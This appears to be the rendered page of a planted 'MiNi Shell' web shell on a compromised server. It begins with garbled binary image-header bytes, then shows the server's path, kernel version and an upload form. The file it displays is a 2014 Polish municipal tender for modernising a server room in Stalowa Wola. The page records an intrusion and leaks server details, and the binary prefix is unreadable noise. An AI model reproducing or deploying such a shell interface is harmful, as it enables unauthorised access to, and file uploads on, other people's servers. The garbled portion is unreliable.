JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140428/142804-N-2014.html

<p class="kh_header"><b>Stalowa Wola: Modernizacja serwerowni w budynku przy ul. Wolności 9.</b><br>
<b>Numer ogłoszenia: 142804 - 2014; data zamieszczenia: 28.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stalowa Wola , ul. Wolności 7, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433456, faks 015 6433412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja serwerowni w budynku przy ul. Wolności 9..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest modernizacja serwerowni w budynku Urzędu Miasta
Stalowej Woli przy ul. Wolności 9.
2. Zasadniczy zakres robót obejmuje:
1) Roboty montażowe:
- Dostawa kompletnej podłogi technologicznej - systemowej wraz z kompletem
akcesoriów montażowych i elementami wykończeniowymi;
- Przygotowane podłoża pod montaż elementów mocujących podłogę
technologiczną;
- Demontaż istniejącego okablowania strukturalnego i ułożenie w wykonanej
podłodze technologicznej wraz z podłączeniem;
- Ponowne podłączenie okablowania w serwerowni i sprawdzenie poprawności
działania;
2) Przeniesienie i konfiguracja istn. instalacji monitoringu CCTV:
- Demontaż istniejącego okablowania w użytkowanych pom. biurowych wraz z
zasilaniem;
- Ułożenie kabli zasilających oraz sygnałowych monitoringu CCTV;
- Montaż w wyznaczonym miejscu rejestratora wraz z zasilaczem oraz jego
podłączenie;
- Sprawdzenie poprawności działania i skonfigurowanie systemu monitoringu;
- Wykonanie pomiarów sprawdzających.
3) Wyposażenie serwerowni:
- Dostawa wraz ze złożeniem i montażem szafy metalowej z drzwiami;
- Dostawa wraz ze złożeniem i montażem stolika metalowego na kółkach.
- Dostawa i montaż czujki pożarowej optycznej wraz z sygnalizacją i własnym
zasilaniem.
- Dostawa wraz ze złożeniem i montażem stojaka metalowego 19U
- Montaż zamka szyfrowego do drzwi typu LOCKDATA z własnym zasilaniem.
3. Szczegółowy zakres robót określa przedmiar robó t stanowiący załącznik do
niniejsze j specyfikacj i .
4. Materiały uzyskane w trakcie rozbiórek i ziemia z wykopów przedstawiających
wartość użytkową lub materialną zostaną przekazane Zamawiającemu.
5. Lokalizacja przedmiotu zamówienia: Budynek Urzędu Miasta Stalowej Woli przy ul.
Wolności 9..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w
art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tj.
(Dz. U. z 2013 r., poz. 907 z późń. zm.), do 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 45.30.00.00-0, 45.43.21.20-1, 45.43.21.21-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca złoży oświadczenie na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki:
1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę;
2) Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy
z dnia 29.01.2004 r. Prawo zamówień publicznych - załącznik nr 1;
3) Parafowany wzór umowy - załącznik nr 3;
4) Zakres zamówienia powierzony podwykonawcom - załącznik nr 4;
5) Kosztorys ofertowy wykonawcy, sporządzony metodą uproszczoną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazana jest istotna zmiana postanowień zawartej umowy w stosunku do treści oferty, na
podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2.
2. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy
1) zmiana dotycząca sposobu spełnienia świadczenia, w szczególności ze względu na:
a) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej
lub technicznej, bądź też w kosztorysie ofertowym Wykonawcy spowodowana zaprzestaniem
produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b) pojawienie się na rynku części, materiałów lub urządzeń nowszej generacji, pozwalających
na zaoszczędzenie kosztów realizacji przedmiotu zamówienia lub kosztów eksploatacji
wykonanego przedmiotu zamówienia, zwiększenia bezpieczeństwa,
c) pojawienie się nowszej technologii wykonania przedmiotu zamówienia, pozwalającej na
zaoszczędzenie czasu realizacji zamówienia lub jego kosztów, jak również kosztów
eksploatacji wykonanego przedmiotu zamówienia,
d) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań
technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło
niewykonaniem lub wadliwym wykonaniem przedmiotu zamówienia;
e) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie
gruntu, kurzawka itp.), skutkujące niemożliwością zrealizowania przedmiotu umowy przy
dotychczasowych założeniach technologicznych;
f) odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej warunki
terenowe, geologiczne, wodne, istnienie niezinwentaryzowanych (nieujętych w dokumentacji)
urządzeń, instalacji lub obiektów;
g) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub
materiałowych ze względu na zmiany obowiązującego prawa;
2) zmiana wysokości wynagrodzenia określonego w § 7 ust. 1 umowy:
a) w związku z okolicznościami wymienionymi w ust. 2 pkt 1
3) zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie
Zamawiającego,
b) działania siły wyższej, uniemożliwiającej wykonanie robót w określonym pierwotnie
terminie,
c) zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających
wykonywanie prac budowlanych lub spełnienie wymogów technologicznych,
udokumentowanych w dzienniku budowy, potwierdzonych przez inspektora nadzoru
inwestorskiego.
d) błędów w dokumentacji projektowej, których usunięcie będzie poprzedzać konieczność
konsultacji z projektantem i naniesienia przez niego poprawek lub zmian w projekcie,
e) konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie robót,
f) konieczności zmiany harmonogramu robót i finansowania,
g) konieczności wykonania dodatkowych badań i ekspertyz,
h) prac lub badań archeologicznych, wykopalisk, powodujących konieczność wstrzymania
robót objętych niniejszą umową,
i) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy,
wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań, w
tym udzielenie w trakcie realizacji umowy zamówień dodatkowych i/lub uzupełniających,
związanych
z realizacją zmówienia podstawowego, mających wpływ na uzgodniony termin zakończenia
jej realizacji (powodujących konieczność jego wydłużenia),
j) wstrzymanie realizacji robót przez uprawniony organ z powodu znalezienia niewybuchów
i niewypałów,
k) jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające
się przypisać Zamawiającemu, personelowi Zamawiającego lub innemu wykonawcy
zatrudnionemu przez Zamawiającego na teranie budowy.
4) powierzenie Podwykonawcy określonego zakresu robót na skutek którejkolwiek z
okoliczności wskazanych w pkt. 1, 2 i 3 niniejszego ustępu - i pod warunkiem, że
Zamawiający nie zastrzegł, iż dana część zamówienia nie może być powierzona
Podwykonawcom,
5)zmiana przedstawicieli stron - kierownika budowy, kierowników robót, inspektorów
nadzoru - w przypadku niemożności pełnienia przez nich powierzonych funkcji (np.
zdarzenia losowe, zmiana pracy, rezygnacja, zmiana inspektora nadzoru w związku z
upływem okresu na jaki została zawarta z nim umowa i zawarciem przez Zamawiającego
umowy z innym inspektorem nadzoru).
3.Zmiany umowy przewidziane w ust. 2 dopuszczalne są na następujących warunkach:
1)ad pkt 1) - pod warunkiem nie zwiększania ceny, a ponadto w przypadku zmiany na
materiały, urządzenia i sprzęt - pod warunkiem posiadania co najmniej takich samych
parametrów jakościowych i cech użytkowych, jak te, które stanowiły podstawę wyboru
oferty;
2)ad pkt 2) lit.a)- w zakresie nie powodującym zwiększenia wynagrodzenia Wykonawcy
określonego w niniejszej umowie,
3)ad pkt 3):
- lit. a) - w zakresie uzasadnionego interesu Zamawiającego,
- lit. b) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania,
- lit. c) - o czas trwania niesprzyjających warunków atmosferycznych,
- lit. d), f), h), l), j), k) - o czas niezbędny do usunięcia przeszkody w prowadzeniu robót
objętych przedmiotem umowy,
- lit. e), g) - o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień lub do
wykonania dodatkowych ekspertyz, badań,
- lit. i) - o czas opóźnienia, utrudnienia lub przeszkody opisanych przy lit. i).
4. Wszelkie zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie
pisemnego aneksu do umowy pod rygorem nieważności.
5. Zmiany niniejszej umowy wymagają zgody obu stron wyrażonej w formie pisemnej
w postaci aneksu do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.stalowawola.pl/?c=mdPrzetargi-cmPokaz-1203<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Stalowa Wola
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 12:00, miejsce: Urząd Miasta Stalowa Wola
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com